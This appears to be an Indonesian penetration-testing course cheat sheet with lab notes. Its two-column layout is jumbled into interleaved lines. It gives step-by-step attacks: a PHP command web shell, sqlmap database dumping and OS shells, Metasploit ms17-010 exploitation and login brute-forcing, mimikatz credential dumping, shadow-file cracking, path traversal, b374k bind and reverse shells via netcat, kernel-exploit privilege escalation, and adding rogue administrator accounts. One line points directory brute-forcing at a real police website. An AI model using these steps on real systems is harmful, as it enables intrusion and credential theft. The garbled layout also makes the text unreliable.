Anda di halaman 1dari 10

———————————— dir —> melihat daftar file di direktori tempat kita berada

MKWH (Musti Wajib Kudu Harus)


———————————— ————————————
# nmap -sV ip_target —> Cek versi service secara detil Linux:
# nmap -A ip_target —> Cek seluruh informasi yang dapat di-enumerate ————————————
# ifconfig
Cek IP Address sederhana: # /sbin/ifconfig
ping www.target.com # cat /etc/passwd
ping subdomain.target.com # cat /etc/shadow
# ls -al —> untuk melihat daftar file di direktori tempat kita berada secara lengkap
Host Scan (Up or Down) # pwd —> melihat lokasi direktori saat ini
Misalnya ada IP 172.16.10.15, maka ganti angka terakhir dengan 0/24 # cd --> pindah direktori —> cd /root/Desktop/
# nbtscan 172.16.10.0/24 Cara buat file:
# nmap -sP 172.16.10.0/24 # nano nama_file —> CTRL+X lalu Y lalu Enter
———————————— # ssh nama_user@ip_target —> lalu ketik yes dan lanjutkan dengan Enter
Common directory Location: # cd /tmp —> Direktori tempat dapat menulis dan eksekusi segala hal
———————————— # locate cmd.php
Cek /robots.txt # locate cmd.war
/adm # locate cmd.jsp
/admin # cp lokasi_file_secara_penuh /root/Desktop
/adminpanel
/administrator Shell —> PHP, JSP (WAR), ASP, ASPX, …
/backend Untuk PHP Shell, pakai yang pernah di-share di WA.
/dashboard
/login ————————————
/manage Custom PHP Shell - Dengan Form
/manager ————————————
/pma <HTML><BODY>
/phpmyadmin <FORM METHOD="GET" NAME="myform" ACTION="">
———————————— <INPUT TYPE="text" NAME="cmd">
Common username: <INPUT TYPE="submit" VALUE="Send">
———————————— </FORM>
adm, admin, administrator, sa, root, nama_perusahaan <pre>
nama_departemen, nama_pic, nama_jalan, nama_aplikasi <?php
———————————— if($_GET['cmd']) {
Common username: system($_GET['cmd']);
———————————— }
seluruh_username_menjadi_password, ?>
toor, P@ssw0rd, Pa$$w0rd, Passw0rd, password, </pre>
abc123, admin123, etc </BODY></HTML>
————————————
Windows: ————————————
———————————— SQLMap Tips - GET Method
ipconfig ————————————
net user nama_user kata_sandi /add # sqlmap -u "http://target.com/?ParA=1&ParB=2&ParC=3" --dbs
net localgroup administrators nama_user /add # sqlmap -u "http://target.com/?ParA=1&ParB=2&ParC=3" -D nama_db --tables
type nama_file —> melihat file # sqlmap -u "http://target.com/?ParA=1&ParB=2&ParC=3" -D nama_db -T nama_tbl --columns
cd —> pindah direktori # sqlmap -u "http://target.com/?ParA=1&ParB=2&ParC=3" -D nama_db -T nama_tbl -C nama_kol
1
--dump msf5 > use auxiliary/scanner/postgres/postgres_login —> Postgre SQL
# sqlmap -u "http://target.com/?ParA=1&ParB=2&ParC=3" --os-shell msf5 > use auxiliary/scanner/ftp/ftp_login —> FTP
msf5 > use auxiliary/scanner/telnet/telnet_login —> Telnet
msf5 > use auxiliary/scanner/smb/smb_login —> Remote Desktop / Windows Authentication
———————————— msf5 > set RHOSTS ip_target
SQLMap Tips - POST Method msf5 > set USERNAME tentukan_username_nya_di_sini_satu_saja
———————————— ATAU
# sqlmap -r nama_file_yang_berisikan_http_request --dbs msf5 > set USER_FILE masukan_lokasi_file_yang_berisikan_daftar_username_di_sini
# sqlmap -r nama_file_yang_berisikan_http_request -D nama_db --tables msf5 > set PASS_FILE masukan_lokasi_file_yang_berisikan_daftar_password_di_sini
# sqlmap -r nama_file_yang_berisikan_http_request -D nama_db -T nama_tbl --columns NOTES: apabila port nya berbeda, maka gunakan perintah berikut:
# sqlmap -r nama_file_yang_berisikan_http_request -D nama_db -T nama_tbl -C nama_kol msf5 > set RPORT masukan_nilai_port_yang_dituju_di_sini
--dump msf5 > run
# sqlmap -r nama_file_yang_berisikan_http_request --os-shell
# unshadow file_passwd file_shadow > nama_file_gabungan ————————————
# john nama_file_gabungan MS SQL Metapsloit Simple Tips:
————————————
——————————— Ketika sudah dapat password, exec MSSQL (fitur xpcmd_shell):
mimikatz: msf5 > use auxiliary/admin/mssql/mssql_exec
———————————— msf5 > set RHOSTS ip_target
> run as administrator (klik kanan) msf5 > set CMD cmd.exe /c ipconfig
mimikatz > privilege::debug ganti ipconfig dengan command nya windows
mimikatz > log msf5 > run
mimikatz > sekurlsa::logonPasswords Ingat, satu perintah, satu eksekusi run
————————————
——————————— MySQL Simple Tips and Trick
Metasploit Simple Tips: ————————————
———————————— # mysql -h ip_address -u nama_user -p —> default username = root
# msfconsole password: <masukan password>
msf5 > search ms03-026 atau ms08-067 atau ms17-010 mysql > show databases;
msf5 > use exploit/…/…/…/ (ambil dari hasil search di atas) mysql > use nama_database_yang_dituju;
msf5 > set RHOST ip_target mysql > select * from nama_tabel_dari_database_yang_dituju;
msf5 > set PAYLOAD windows/meterpreter/bind_tcp ————————————
khusus ms17-010 > set PAYLOAD windows/x64/meterpreter/bind_tcp Dirsearch Download and Use
msf5 > exploit ————————————
———————————— # cd /root/Desktop
Simple Brute Force Tips: # wget https://github.com/maurosoria/dirsearch/archive/master.zip
———————————— # unzip master.zip
Default Port: # cd dirsearch-master
MSSQL (1433), MySQL (3306), Oracle (1521), Postgre SQL (5432) # python3 dirsearch.py -e .asp, .aspx, .jsp, .php, .csv, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf,
FTP (21), SSH (22), Telnet (23), Remote Desktop Microsoft Windows (3389) .bak, .conf, .config, .old, .sql, .jar, .rar, .zip, .tar, .tar.gz, .apk, .ipa, .cgi, .do, .htm, .html, .js, .json,
SMB (445), HTTP (80), HTTPS (443) .rb, .xml, .yml, .svn, .git -u
————————————
Simple Brute Force Tips:
http://172.16.10.243/
————————————
msf5 > use auxiliary/scanner/mysql/mysql_login —> Mysql 1 dragon 11 coffee
msf5 > use auxiliary/scanner/mssql/mssql_login —> Microsoft SQL 2 Rebecca.txt 12 5
msf5 > use auxiliary/scanner/ssh/ssh_login —> SSH 3 Windows Server 2012 13 Apache/2.4.27
msf5 > use auxiliary/scanner/oracle/oracle_login —> Oracle
2
user administrator Pa$$w0rd 14 Fire98 dengan membandingkan hash nya(terletak di direktori dokumen/secret)
4 1-202-502-2431 15 - cek file2 nya dengan hash call, yang nilai hasnya gak ada, itu yg di modif
5 Windows Serrver 2012 16 8011 6. cari no telepon arif pada situs aaa.com (gunakan credensial berikut)
6 192.168.1.65 17 1980-89547361 user :aaaa, pass: dsdsds
7 Windows 8 18 192.168.1.79-192.168.1.17 - buka situnya - login - masuk halaman my profile/contact - berubah jadi
8 access1045 (source port xxxx-destination port xxxx) http://www.abc.com?id=1
9 890954235154 19 192.168.1.99 - ubah belakang angkanya http://www.abc.com?id=1 atau 2 atau 3 dst sampai ketemu
10 Agent 20 192.168.1.16 namanya
================================================================ 7. pada salah satu server ada halaman snmp yang aktif, cari berapa ip servernya
1. pada dir dokumen, terdapat beberapa gambar, temukan nomor telepon yang ada - masuk ke kali linux -- nbtscan 10.10.10.0/24
pasa salah satu gambar yang terletak - snmp -c public x.x.x.x (semua ip yang di temukanb dari atas)
pada Dir dokumen tersebut (ini direktori ada di windows server kita sendiri) - atau nmap -sU x.x.x.0/24 - cari port 161 snmp udp yang hidup
- klick petir - window key - file explorer - baru snmp -c public x.x.x.x
- klik this pc -ceh tools - modul 6 (system hacking) - steganography tools - image 8. file responder, carilah plaintext password dari log responder (hint file xxx.txt)
steganografi tools - quickstego – install - cd /user/share/responder
2. di dalam salah satu server ada layanan ftp, retas ke layanan itu dan ambil datanya, - ls
tuliskan isinya - cd logs
- harus ke kali linux - john xxx.txt
- if config - ./responder.py -I eth0 -- eth 0 tergantung dari ip kita
- nmapnmap -sV x.x.x.0/24 atau nmap -p21 x.x.x.0/24 9. ada file di direktori dokumen yg berisikan komunikasi korban menuju web, di
- msfconsole dalamnya ada pas utk login
- use auxiliary/scanner/ftp/ftp_login carilah password
- set RHOSTS x.x.x.x - cari yg berhubngan dengan http, klik kanan, follow tcp stream
- set USER_FILE /root/Desktop/Wordlist/user (untuk ambil user) - cari user dan passwordnya yg berwarna merah
- set PASS_FILE /root/Desktop/Wordlist/katasandi (untuk katasandi) 10.ada suatu aplikasi yg telah diretas yang menggunakan wordpress. kemudian
- set VERBOSE false -- untuk memperlihatkan yang benar terdapat akun bernama john yang pass diganti
- run tugas, cari tau nilai pass john yang baru
- setelah dapat pass ketik ftp x.x.x.x - nmap -p80 10.10.10.0/24
- ftp> dir - cek ada 1 IP yang pada saat port 80 di aksez masuk ke halaman WAMP scrool
- ini_file_saya.txt paling bawah klik file DVWA (klik kanan)
- ftp>get ini_file.txt - jalankan burpsuit di kali linux
- ftp>bye - jalankan firefox
3. ada server menggunakan apache, cari versi apachi nya - http://10.10.10.x/DVWA
- hasil nmap tadi cari yang ada apachenya, kemudia copy - login -- password, password
4. ada salah satu server yang membuka remote desktop service, beritahukan berapa ip - pilih sql injection, baru ketik asal aja
servernya, ingat, ip selain server anda - cek di burpsuit di history yang sesuai di cek
dan windowsnya apa -sqlmap -r
- cari port yang 3389 (remote desktop) di linux - cd /root/Desktop
- balik ke windows cek ip kita dulu biar tidak salah - nano FRfilesql
- rdesktop ipnya target - command di linux - file di dalam
5. seorang konsultan mendapati situasi bahwa perusahaan x telah terkompromise, - sqlmap -r FRsql --dbs
konsultan melihat file pilih yang huruf2 besar saja
yg di modif attacker, ada 1 file lagi yang di duga di modif attack. cari nama file - sqlmap -r FRsql -D schoolcms(yg dipilih) --tables
3
- sqlmap -r FRsql -D schoolcms -T sh_users,sh_siswa,sh_guru_staff --columns
- sqlmap -r FRsql -D schoolcms -T sh_users -C nmap –sV IpAddress
sandiusers,s_username,namausers,email_users,level_users --dump - elihat port apa yg aktif dan versi berapa
nmap –A IpAddress
11. ada aplikasi yg rentan, temukan jumlah user yg ada di dalam aplikasi - Melihat seluruh layanan yg up
- balik ke sqlmap -r FRsql(nama file) --dbs Melihat versi OS secara detail
- sqlmap -r FRsql -D schoolcms(yg dipilih) --tables - Melihat versi
- sqlmap -r FRsql -D schoolcms -T sh_users,sh_siswa,sh_guru_staff --columns nmap –sU IpAddress
- sqlmap -r FRsql -D schoolcms -T sh_users -C - Melihat UDP yg aktif
sandiusers,s_username,namausers,email_users,level_users --dump
- kita lihat mana port yang dapat di akses dalam hal ini port 8080 yang menggunakan
12. beritahu apa sistem operasi yaang digubnakan oleh layanan ftp http
- nmap -p21 10.10.10.0/24
- dapat 10.10.10.x celah :
- nmap -sV 10.10.10.x - software uppdate / patch atau version. kalau versi rentan bisa dengan kode exploit
- os paling bawah yang beredar
- apabila kalau tidak keluar maka gunbakan opsi nmap -A 10.10.10.x - user name password lemah / credential
- kesalahan konfigurasi
13. cari satu aplikasi xxxx.com yang terdeteksi rentan, di dalamya terdapat nama user,
cari nama user id nomor 11 - setealh mengetahui akses ip tersebut mmenggunakan celah port tersebut
- nyalakan dulu burpsuit nya http://172.16.10.121:8080, dalam hal ini kita sudah
- baru masuk ke web, dan coba login asal tau password di administrationnya.
- cek di burpsuit di history yang sesuai di cek (post)
-sqlmap -r cari shell dengan command di linux :
- cd /root/Desktop locate cmd.php
- nano FRfilesql(nama file) locate cmd.war
copy dari history burpsuit, user dan pass di ganti * krn POST beda dengan GET cp /usr/share/laudanum/jsp/cmd.war /root/Desktop (copy)
- sqlmap -r FRsql(nama filenya) --dbs ganti nama cmd.war jadi nama kita
pilih yang huruf2 besar saja (kecuali ada 1 yang harus N)
- sqlmap -r FRsql -D schoolcms(yg dipilih) --tables masuk ke http://172.16.10.121:8080 dan deploy file .war nya
- sqlmap -r FRsql -D schoolcms -T sh_users,sh_siswa,sh_guru_staff --columns
- sqlmap -r FRsql -D schoolcms -T sh_users -C akses http://172.16.10.121:8080/JONO/cmd.jsp
sandiusers,s_username,namausers,email_users,level_users –dump
buat user dengan comand :net user_name password /add
=============================================================== masukkab user ke group admin : net localgroup administrators user_name /add
lihat user nya : net user

hari ke 2 remote desktop dari windows ke 172.16.10.121 dengan user dan password yang
telah di buat
tomcat
case port 8080 yang akan diserang download Mimikatz dari githup yang .zip
kita dapatkan ip yang akan di serang 172.16.10.119, 172.16.10.120, 172.16.10.121 copy file nya ke os target yang sedang di remote, dan jalankan file exe nya sesuai
lakukan scaning dengan menggunakan command di linux dengan bit nya dengan run as administator
4
ketik command -- privilage::debug
log ----------------------------root
sekurlsa::logonPassword dari ip 172.16.10.154, ditemukan ada 3 port yaitu 22 (ssh), 10000 (ada user dan
---------------------------------------------------------------------------------------------------------- passwword)
LAB 3 file disclosure (cari code exploit) pada port 10000 ditemukan menggunakan webmin, kemudian kita cari bagaimana
webmin exploid di google
172.16.10.154 masuk ke terminal untuk melakukan eksekusi
scan lagi - masuk ke direktori desktop -- cd /root/Desktop
nmap –sV IpAddress - download file webmin exploit -- wget web download
- elihat port apa yg aktif dan versi berapa - ubah file download menjadi .pl -- mv file file.pl
nmap –A IpAddress - ubah mode script agar daoat di gunakan -- chmod 755 file.pl
- Melihat seluruh layanan yg up - jalankan file -- perl file.py
Melihat versi OS secara detail - kemudian cari user dan password yang berjalan pada ip target -- perl file.py iptarget
- Melihat versi 10000 /etc/passwd 0
nmap –sU IpAddress /shadow 0
- Melihat UDP yg aktif - buat file di desktop dengan cara copy user dan password dengan menggunakan
vi /nano
buka port 10000 ada framwork webmin - kombinasikan dengan unshadow -- unshadow filepass fileshaw > filegabungan
- carck nama file dengan aplikasi john
command : - setelah itu login -- ssh alice@ip target
#cd /root/desktop - buka command -- sudo su
#mv nama awal nama akhir, bisa juga memindahkan file - cek fersi kernel nya --uname -a
#wget https -- download - cek versi distro linux -- cat /etc/issue
# chmod 755 nama file - naikkan alice menjadi root dengan cara : -- comand bash dahulu
#nano nama file -- membuat suatu file dengan ekstensi tertentu - google versi kernelnya : kernel 2.6.32-21 exploit
#unshadow - setelah itu masuk ke command lagi untuk mengecek di direktori mana bisa
#pwd -- liat direktori yang diakses membuat file -- ls -al
#rm nama file --> remove file - diketahui ada file yang bisa di tulis (kalau oenuh ada -) di temp -- cd /tmp
- download file tersebut dari website nya dengan lihat view rar dengan copy paste --
passwd -- informasi user /etc/psswd nano namafile (paste) ctr X, Y enter
-- yang bisa untuk login harus ada /home/xxx & /bin/sh atau /bin/bash wajib - rubah file name tersebut menjadi .c -- mv nama file namafile.c -- mv FR-exploit2
-- dapat diaskses oleh user terendah sekalipun FR-exploit2.c
- file code jadi file bin -- gcc FR-exploit2.c -o FR_done2
shadow -- lokasi di etc /etc/shadow - eksekusi -- ./FR_done2
-- encrypt password HARI KE 3
-- hanya dapat diakses oleh root accessnet lAB 4

jhon - aplikasi cracking MENYERANG 172.16.10.167

vi - esc--i :wq scan lagi


cat - untuk lihat isi dari file nmap –sV IpAddress
locate file -- untuk mengetahui dimana file tersebut tersimpan - elihat port apa yg aktif dan versi berapa
mkdir -- membuat folder nmap –A IpAddress
5
- Melihat seluruh layanan yg up 192.168.56.101
Melihat versi OS secara detail 192.168.56.0/24
- Melihat versi - untuk cari ip apa saja yang konek -- nmap -sP x.x.x.0/24
nmap –sU IpAddress hasil -- x.x.x.1 --buang, krn bukan target
- Melihat UDP yg aktif -- x.x.x.100 --
di dapat port yang terpakai 20 / ssh -- x.x.x.101 -- ip kita kali linux
-- x.x.x.102 --
CATATAN
- cara copy kalau tidak bisa melalui donwload, jadi masuk ke linux kita dulu baru
- EXPLOITASI DIRECTORY dengan mencari -- locate nama file (copy lokasi)
Tambahkan command robots.txt untuk melihat directory yang tidak di hide. - kemudian cat lokasi file
apabila gagal coba default nama directory yang biasa digunakan. /adm /admin ---------------------------------------------------------------------------------------------
/administrator /dashboard /login LAB 5
/phpMyAdmin/manage/pma dll attack 172.16.20.117
- dapat file 172.16.20.117/robots.txt
ditemukan 172.16.10.220:22/administrator dengan menggunakan cupa - masuk ke dalam dashboard dengan user tebak -- admin / P@ssw0rd
- search cuppa exploit - masuk ke setting dan tambahkan ekstensi baru -- .php
- download file nya pada terminal -- wget web download - lalu file ini di save dalam bentuk .php lalu di upload ke file manager
- ubah download -- mv file file.php (karena menggunakan php) <HTML><BODY>
- jalankan file -- php file.php <FORM METHOD="GET" NAME="myform" ACTION="">
- di ddapat comand di dalam file php : <INPUT TYPE="text" NAME="cmd">
http://target(IP)/cuppa(administrator)/alerts/alertConfigField.php? <INPUT TYPE="submit" VALUE="Send">
urlConfig=../../../../../../../../../etc/passwd </FORM>
- ditemukan user bourne dan passwordnya dalam hal ini sudah diketahui <pre>
- setelah itu login -- ssh bourne@ip target <?php
- buka command -- sudo su if($_GET['cmd']) {
- cek fersi kernel nya --uname -a system($_GET['cmd']);
- cek versi distro linux -- cat /etc/issue }
- naikkan alice menjadi root dengan cara : -- comand bash dahulu ?>
- google versi kernelnya : kernel xxxxx exploit </pre>
- setelah itu masuk ke command lagi untuk mengecek di direktori mana bisa </BODY></HTML>
membuat file -- ls -al
- diketahui ada file yang bisa di tulis (kalau penuh ada -) di temp -- cd /tmp - lalu copy link file yang telah di upload dengan di tambahkan belakangnya
- download file tersebut dari website nya dengan lihat view rar dengan copy paste -- /etc/passwd untuk melihat user
nano namafile (paste) ctr X, Y enter - ditemukan usernya avenger, dan lakukan masuk -- ssh avanger@172.16.20.117
- cara copy kalau tidak bisa melalui donwload, jadi masuk ke linux kita dulu baru - cara lainnya dengan menggunakan aplikasi b374k tanpa harus tau user dan
dengan mencari -- locate nama file (copy lokasi) password, anti virus di matikan.
- kemudian cat lokasi file - upload di file manager cuppa
- rubah file name tersebut menjadi .c -- mv nama file namafile.c -- mv FR-exploit2 - jalankan dan ,masuk ke RS / passwornya b374k
FR-exploit2.c - pilih bind shell - atur port nya 1- 65535 krn ip sudah otomatis target dan GO
- file code jadi file bin -- gcc FR-exploit2.c -o FR_done2 - balik ke terminal -- nc iptarget porttarget
- eksekusi -- ./FR_done2 - setlah itu ketik -- /var/www/cuppa>/bin/bash -i
- cd /tmp
6
- dst mulai wget ..... nmap –sU IpAddress
- setelah logon lakukan langkah selanjutnya : - Melihat UDP yg aktif
- cek fersi kernel nya --uname -a
- cek versi distro linux -- cat /etc/issue terlihat memakai phpfilemanager
- naikkan alice menjadi root dengan cara : -- comand bash dahulu serach phpfilemanager exploit
- google versi kernelnya : kernel xxxxx exploit
- setelah itu masuk ke command lagi untuk mengecek di direktori mana bisa gunakan command ini di brwser :
membuat file -- ls -al
- diketahui ada file yang bisa di tulis (kalau penuh ada -) di temp -- cd /tmp https://172.16.20.146/index.php?
- download file tersebut dari website nya dengan lihat view rar dengan copy paste -- action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=ipconfig -- masuk
nano namafile (paste) ctr X, Y enter https://172.16.20.146/index.php?
- cara copy kalau tidak bisa melalui donwload, jadi masuk ke linux kita dulu baru action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=netuser Frans
dengan mencari -- locate nama file (copy lokasi) P@ssw0rd /add
- kemudian cat lokasi file https://172.16.20.146/index.php?
- rubah file name tersebut menjadi .c -- mv nama file namafile.c -- mv FR-exploit2 action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=net localgroup
FR-exploit2.c administrators Frans%20/add
- file code jadi file bin -- gcc FR-exploit2.c -o FR_done2 pr
- eksekusi -- ./FR_done remote dengan user yang telah ditambah menjadi admin

------------------------------------------------------------------ download Mimikatz dari githup yang .zip


Metasploit copy file nya ke os target yang sedang di remote, dan jalankan file exe nya sesuai
dengan bit nya dengan run as administator
ms03-026 ketik command -- privilege::debug
ms08-067 log
ms09-050 sekurlsa::logonPasswords
ms17-010 dapat pass adminstrator dan usernya, sekarang login nke administrator dengan
remote lagi
panggila metasplot -- msfconsol lakukan enginering atau pencarian terhadap apaupun, di firefox di temukan ada email
kode exploit -- klo gak buat ambil alih, pasti merusak dan password
kode auxilary -- untuk scanningroo di dalam email ada login2 dan lainnya dengan pencarian :

-------------------------------------------------------------------------------------------------------- gunakan credential untuk masuk ke codiad


LAB 6 ----------------------------------------------------------------------------------------------

172.16.20.146 (windows) MATERI dan LAB 7 sql iject

scan lagi interceptor tools (burpsuite) harus paham


nmap –sV IpAddress get -- sesuatu yang di refleksikan di url
- elihat port apa yg aktif dan versi berapa Post -- tidak di refleksikan di url -- butuh interseptor untuk injeksi 4 soal ada di ujian
nmap –A IpAddress
- Melihat seluruh layanan yg up latihan :
Melihat versi OS secara detail run kalilinux nya
- Melihat versi
7
proxy Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
matikan inersep Accept-Language: en-US,en;q=0.5
buka firefox untuk belokkan browser Accept-Encoding: gzip, deflate
buka burp lihat setting untuk lihat ip di option dan centang running Referer: http://172.16.20.158/school/
balik ke firefox lagi untuk setting preferences - proxy - setting ip sesuai brup dan Connection: close
centang semua Cookie: PHPSESSID=bm0renr0nc5ch8hi0uqcevgm17
buka lagi burp masuk ke http history untuk lihat scaningnya Upgrade-Insecure-Requests: 1

skrg https, biasa kena block - sqlmap -r FRsql --dbs


www.burp - download sertificate pilih yang huruf2 besar saja
masuk ke setting firefox - preference - certificate - vief dan import (centang 22NYA) - sqlmap -r FRsql -D schoolcms(yg dipilih) --tables
masuk ke www.google - sqlmap -r FRsql -D schoolcms -T sh_users,sh_siswa,sh_guru_staff --columns
buka lagi burp masuk ke http history untuk lihat scaningnya - sqlmap -r FRsql -D schoolcms -T sh_users -C
sandiusers,s_username,namausers,email_users,level_users --dump
---------------- PArameter dan VAlue
' or '1'='1 -- benar dapat username dan password
' or '1'='2 masuk ke admin schoolcms
misal https://www.liputan6.com/bola/?p=info&id=2 cari celah pada dashboard, dalam hal ini di materi pelajaran
inject file.php
parameter = sesuatu yg di depan running
value = sesuatu yg di belakang http://172.16.20.158/school/file/materi/file.php/etc/passwd
tambah user
p=info net user FR007 James12Frany@ /add
parameter = p net localgroup administrators FR007 /add
value = info
- ditemukan usernya avenger, dan lakukan masuk -- ssh avanger@172.16.20.117
id=2 - cara lainnya dengan menggunakan aplikasi b374k tanpa harus tau user dan
para = id password, anti virus di matikan.
val = 2 - upload di file manager cuppa
- jalankan dan ,masuk ke RS / passwornya b374k
- pilih bind shell - atur port nya 1- 65535 krn ip sudah otomatis target dan GO
https://www.liputan6.com/bola/?p=info&id=2' or '1'='1 -- - balik ke terminal -- nc iptarget porttarget
- setlah itu ketik -- /var/www/cuppa>/bin/bash -i
DBMS -- DB -- Tables --colums -- filed/data - cd /tmp
DBMS dan daftar DB --> sqlmap -r nama_file gutu - dst mulai wget .....
sqlmap -r - setelah logon lakukan langkah selanjutnya :
- cd /root/Desktop - cek fersi kernel nya --uname -a
- nano FRfilesql - cek versi distro linux -- cat /etc/issue
- file di dalam - naikkan alice menjadi root dengan cara : -- comand bash dahulu
- google versi kernelnya : kernel xxxxx exploit
GET /school/?p=info&id=* HTTP/1.1 - setelah itu masuk ke command lagi untuk mengecek di direktori mana bisa
Host: 172.16.20.160 membuat file -- ls -al
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - diketahui ada file yang bisa di tulis (kalau penuh ada -) di temp -- cd /tmp
8
- download file tersebut dari website nya dengan lihat view rar dengan copy paste -- run
nano namafile (paste) ctr X, Y enter
- cara copy kalau tidak bisa melalui donwload, jadi masuk ke linux kita dulu baru B374K dll
dengan mencari -- locate nama file (copy lokasi) Didapat file /robots.txt berisikan beberapa direktori
- kemudian cat lokasi file Diketahui bahwa ternyata direktori /cuppa memiliki dashboard sendiri
- rubah file name tersebut menjadi .c -- mv nama file namafile.c -- mv FR-exploit2 Login dengan akun “admin” dan kata sandi “P@ssw0rd” (tanpa tanda kutip)
FR-exploit2.c Kemudian, masuk ke settings, dan tambahkan ekstensi baru di bagian “allowed
- file code jadi file bin -- gcc FR-exploit2.c -o FR_done2 extension”
- eksekusi -- ./FR_done
; *.php → tambahannya
-------------------------------------------------------------------------------------------- Lalu masuk ke “File Manager” dan upload PHP Shell yang telah dipersiapkan
cara mencari direktori otomatis → Dapat pakai yang di-share di WA atau pakai b374k. Versi baru:
https://github.com/b374k/b374k
search file dir search Versi Lama: https://code.google.com/archive/p/b374k-shell/downloads
Setelah ter-upload, klik kanan dan pilih “Show URL” untuk melihat URL tempat Shell itu
kemudian download file nya get
berada.
https://github.com/maurosoria/dirsearch/archive/master.zip
unzip file nya -- unzip master.zip
cd dirsearch-master/ Langkah I
python3 dirsearch.py -u https://polri.go.id/ -e .csv dst Kemudian, lihat file /etc/passwd → Didapat akun avenger. Login ke SSH via akun
avenger → weak password. P@ssw0rd
--------------------------------------------------------------------------------------------- Lalu eksploitasi dengan langkah yang telah dipelajari sebelumnya.
brutforce
Langkah II
mysql -- ujian Download b374k dan upload via fitur File Manager (Download versi 2.7 dari tautan
mssql code.google.com di atas) Buka b374k → Dan masukan password nya: b374k
smb Lalu masuk ke menu “RS”
telnet
ssh Bila memakai cara Bind Shell, maka:
snmp Masukan IP Target dan Port Target (Port target = bebas selama berada di antara 1
– 65535). Setelah klik Go, maka browser akan tampak seperti terus loading.
nmap -sV 172.16.20.0/24
keluar 3306 open mysql
Pada Kali Linux: ketika perintah: # nc ip_target port_target → Contoh: # nc
msfconsole 172.16.20.118 12343
use auxiliary/scanner/mysql/mysql_login
/ssh/ssh_login Port target ini adalah port yang diatur pada bagian sebelumnya.
/smb/smb_login -- untuk remote dsektop dst Bila memakai cara Reverse Shell, maka:
set RHOSTS 172.16.20.115
set USER_FILE /root/Desktop/Dictionary/user Masukan IP Attacker dan Port Attacker (Port Attacker = bebas selama berada di
set PASS_FILE /root/Desktop/Dictionary/katasandi antara 1 – 65535). Setelah klik Go, maka browser akan tampak seperti terus loading.
set VERBOSE false -- untuk memperlihatkan yang benar
Pada Kali Linux: ketika perintah: # nc -lvp port_attacker → Contoh: # nc -lvp 12343
9
Port attacker ini adalah port yang diatur pada bagian sebelumnya.
Setelahnya (apapun pilihan shell nya), maka ketik: www/cuppa> /bin/bash -i

10

Anda mungkin juga menyukai